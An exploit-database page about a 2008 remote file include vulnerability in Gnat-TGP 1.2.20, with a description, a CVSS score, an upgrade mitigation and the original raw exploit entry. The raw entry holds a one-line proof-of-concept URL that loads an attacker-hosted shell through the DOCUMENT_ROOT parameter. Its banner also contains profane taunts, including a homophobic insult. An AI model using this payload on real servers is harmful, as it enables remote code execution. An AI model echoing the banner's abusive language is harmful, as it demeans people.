Gnat-TGP - exploit.company

vendor:

Gnat-TGP

by:

cr4wl3r

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: Gnat-TGP

Affected Version From: 1.2.20

Affected Version To: 1.2.20

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Gnat-TGP <= 1.2.20 Remote File Include Vulnerability

Gnat-TGP version 1.2.20 and prior are vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of Gnat-TGP, which is not vulnerable to this attack.

Source

Exploit-DB raw data:

###############################################################
# Gnat-TGP <= 1.2.20 Remote File Include Vulnerability
# By cr4wl3r
# Download: http://www.komputer.boo.pl/download/skrypty/galerie/gnat-tgp.rar
# Gr33tz: EA ngel, Hmei7, zvtral, mywisdom and all my friend
###############################################################
###############################################################
# Fuck to buat loe tukang show off, dan buat loe yang mengaku dirinya hacker dan pamer sana-sini
# mengatakan orang lain lamer karena suka deface sedangkan dirinya adalah tukang deface
# you are 1337 lamer 1337 hoax and 1337 gay
# i'm injector and rooter in the site and i'm be silent
###############################################################
###############################################################

# PoC: http://server/includes/tgpinc.php?DOCUMENT_ROOT=[Shell]

###############################################################